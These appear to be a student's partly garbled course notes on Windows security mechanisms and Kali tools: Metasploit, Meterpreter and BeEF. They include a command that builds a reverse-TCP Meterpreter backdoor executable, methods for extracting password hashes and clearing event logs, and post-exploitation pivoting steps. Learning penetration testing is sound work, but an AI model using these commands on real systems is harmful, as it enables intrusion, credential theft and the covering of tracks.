course study
1. The core mechanisms implemented by the Windows operating system kernel are:
1) Windows process and thread management mechanism
2) Windows memory management mechanism
3) Windows file management mechanism (NTFS)
4) Windows registry management mechanism (system self-starting in the registry) The application software registered on the mount point can run automatically with the system boot, so it is also a common attack target of many malicious codes and rogue software)
5) Windows network mechanism (from the physical layer of the OSI network reference model to the application layer, on each layer Corresponding Windows network component module)
2. Windows authorization and access control mechanism
Windows authorization and access control mechanism is based on the reference monitor model, implemented by the SRM module in the kernel and the LSASS service in user mode. In Windows server operating systems, users can execute the built-in whoami command to view the access token information of the current user. Windows abstracts all resources to be protected in the system into objects, the specific types include files, directories, registry keys, kernel objects, synchronization objects, private objects, pipes, memory, communication interfaces, etc., and each object will be associated with An SD security descriptor. The object security descriptor consists of the following main attributes: Owner SID, Group SID, DACL discretionary access control list, and SACL system audit access control list.
3. Windows remote security attack and defense technology
Windows remote attack and defense technology can be divided into the following categories: remote password guessing and cracking attacks, attacks on Windows network services, attacks on Windows clients and users. Security Vulnerability Lifecycle on Windows Systems: Vulnerability discovery and disclosure, penetration testing and exploit attacks, vulnerability patching, etc.
4. Other security mechanisms of Windows
Authentication, authorization and access control, and security auditing are three basic security functions. The three most critical security measures to protect the safe and stable operation of Windows systems - firewall, automatic patch update and virus protection. In addition to Security Center, Windows security features include IPSec encryption and authentication mechanism, EFS encrypted file system, Windows file protection mechanism, privacy protection and browsing security protection mechanism provided by the bundled IE browser, etc.
5. Windows system password Ciphertext extraction technology
There are mainly three ways to obtain password ciphertext locally:
1) Copy the password ciphertext file in the file system after booting from another operating system;
2) Use the rdisk tool in the hard disk repair toolkit, Execute the rdisk/s-command to create a copy of the SAM backup file 3) Use the pwdumpX series of tools
to directly extract the password cipher text from the SAM file or active directory Turn off auditing easily) 2) Clean up the event log (use the Event Viewer to open, read and clear the event log on this host)
video learning
1. Retrieval and Exploitation of KaliSecurity Vulnerabilities
searchsploit
searchsploit can use keywords to search for vulnerability information and exp corresponding to the vulnerability. The command searchsploit wordpresslists the vulnerability and file address.
Check out the files listed, for example:
2. The Metasploit Foundation of KaliSecurity Vulnerability Exploitation
Metasploit is often used in penetration testing. This software includes many tools that form a complete attack framework.
1. Start the service
To use metasploit in Kali, you need to start the Postgre SQL database service and the metasploit service first, and then you can fully use the msf database to query exploits and records.
service postgresql start
service metasploit startIf you don't want to manually start the service every time you boot up, you can configure update-rc.d postgresql enable update-rc.d metasploit enable to start with the system
. 2. Path introduction The path
of msf in Kali is /usr/share/metasploit-framework
Auxiliary: auxiliary Module encoders: used by msfencode encoding tools, you can use msfencode -l.
exploits: attack module, every article introducing msf will mention that ms08_067_metapi, it is in this directory.
Payloads: Listed here is the attack payload, that is, the code executed after the attack is successful. For example, windows/meterpreter/reverse_tcp that we often set is under this folder.
post: The post-penetration stage module, the attack code that can be used after obtaining the shell of the meterpreter. For example, the commonly used hashdump and arp_scanner are here.
3. Basic command
msfpayload: used to generate payload or shellcode.
When searching, you can use msfpayload -l | grep "windows"this command to query.
The -o option can list the parameters required by the payload
msfencode: the encoder in msf. In the early days, to bypass AV for encoding, it is now commonly used to encode msfpayload with it to avoid bad strings of exploits.
1) Enter msfconsole, open msf:
2) Find vulnerabilities, use command nmap -sV 192.168.1.124
3) Use set to set parameters:
3. Introduction to Meterpreter of KaliSecurity Vulnerability Exploitation
Meterpreter is an extension module in the metasploit framework. It is used as an attack payload after a successful overflow. The attack payload returns a control channel to us after a successful overflow attack. Using it as an attack payload can get a meterpreter shell link to the target system.
As a post-penetration module, Meterpreter has various types, and the commands are composed of core commands and extended library commands, which greatly enriches the attack methods. It has many useful functions, such as adding a user, hiding something, opening a shell, getting user password, uploading and downloading remote host files, running cmd.exe, capturing screen, getting remote control, capturing keystrokes, clearing applications, Display the system information of the remote host, and display the network interface and IP address of the remote machine.
Common commands:
background: put the current session in the background
load/use: load the module
Interact: switch into a channel
migrate: migrate the process
run: execute an existing module List all existing scripts, commonly used are autoroute, hashdump, arp_scanner, multi_inject, etc.
Resource: Execute an existing rc script The commonly used Meterpreter types are: payload/windows/meterpreter/reverse_tcp For
windows operating system, reverse connection shell, which is relatively stable to use.
Generate Meterpreter backdoor; open MSF, enable monitoring (select exploit/multi/handler); execute door.exe on the target machine;
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.113 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址为192.168.8.113,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)*/4. Metasploit post-penetration testing of KaliSecurity exploits
After the springboard has obtained certain permissions, it is necessary to actively develop the permissions of the intranet host, obtain the specified target information, and probe for system vulnerabilities. With the help of the Meterpreter backdoor that msf has obtained, the series of operations can be easier.
1. View the current network card and network segment information (using ifconfig). You can see three network cards, one is the local network card, the other is the network card we can access, and the other network card has an internal network IP (can not access, you can try ping below).
2. Adding routing table run autoroute -s 10.0.0.1can use the module in msf to attack or scan across network segments. Quickly added via script autoroute.
3. Open socket proxy, create a socks proxy by using auxiliary/server/socks4a module, which can be used for browser, sqlmap, nmap. You can access intranet computers through a proxy.
4. You can freely switch to the session through background and session -i.
5. Enter run to see many commands that can be done on the meterpreter.
6. You can see the post-penetration test module through run post/
7. Obtain intranet information run arp_scanner -r 10.0.0.1/24
8. You can also upload files, do port forwarding and perform subsequent tests, such as upload lcx.exe c:\\transferring files to the root directory of the c drive.
5. BeEF exploited by KaliSecurity vulnerabilities
1. Enter the command to beef-xssstart BeeF
2. Use the default user name beef and default password beef to log
in 3. HOOK lasts until the test page is closed. During this period, it is equivalent to being controlled and can send attack commands. In the Commands module, we A lot of tasks can be accomplished:
Among them, 4 colors represent:
Green: The attack module is available and has strong concealment
Gray: The attack module is available, but the concealment is poor
Orange: Whether the user module is available or not has yet to be verified
Red: The attack module is unavailable Use
4. For example, select the Raw JavaScript module under MISC as a test case, the table on the right has a detailed description of the module, as well as some available parameters. Enter the JavaScript code and click Execute to attack.
5. Proxy function (proxy function)
Select the target host, right-click, select Use as Proxy in the menu; then edit and send the content you want to send in Forge Request in the Rider tab.
6. BeFF does not load Metasploit by default. If you want to use Metasploit's rich attack modules, you need to do some configuration.
Modify the metasploit line in /usr/share/beef-xss/config.yaml to true
to ensure that the IP and other information here are set correctly (not applicable to 127.0.0.1, you need to use the local IP), and modify the Custom path. After configuration, Open msfconsole and run the commandload msgrpc ServerHost=192.168.1.124 Pass=abc123